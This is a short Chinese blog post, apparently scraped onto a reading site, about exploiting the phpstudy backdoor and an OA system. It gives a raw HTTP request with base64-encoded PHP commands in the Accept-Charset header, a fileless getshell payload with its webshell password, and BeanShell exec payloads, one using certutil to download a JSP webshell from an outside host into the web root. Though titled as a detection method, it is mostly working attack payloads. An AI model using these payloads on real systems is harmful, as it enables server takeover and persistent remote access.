美文网首页
phpstudy漏洞检测方法

phpstudy漏洞检测方法

作者: migrate_ | 来源:发表于2019-09-30 10:58 被阅读0次
title:'phpstudy探针"

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

  1. accept-charset 后面是执行语句,经过base64编码过


    0.jpg
    1.jpg
  2. 引用大佬的getshell方式(如有侵权立即删除)
http://sbd.ximcx.cn/OAandPHPstudy/

phpstudybackdoor无文件落地getshell(蚁剑连接):
Accept-Encoding: gzip,deflate
Accept-Charset: ZXZhbCgkX1BPU1RbdDAwbHNdKTs=
密码:t00ls

某OA:Windows,Linux同理,只要把马放到\ecology\filesystem\下就行,测试原版菜刀马和jspspy马兼容性最好,连接地址:http://127.0.0.1/filesystem/jspspy.jsp
bsh.script=exec("cmd+/c+dir+..\ecology\filesystem\");
bsh.script=exec("certutil.exe -split -urlcache -f http://ximcx.cn/content/uploadfile/201807/jspspy.txt 盘符路径\ecology\filesystem\jspspy.jsp");

相关文章

网友评论

      本文标题:phpstudy漏洞检测方法

      本文链接:https://www.haomeiwen.com/subject/uoucpctx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|phpstudy漏洞检测方法|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!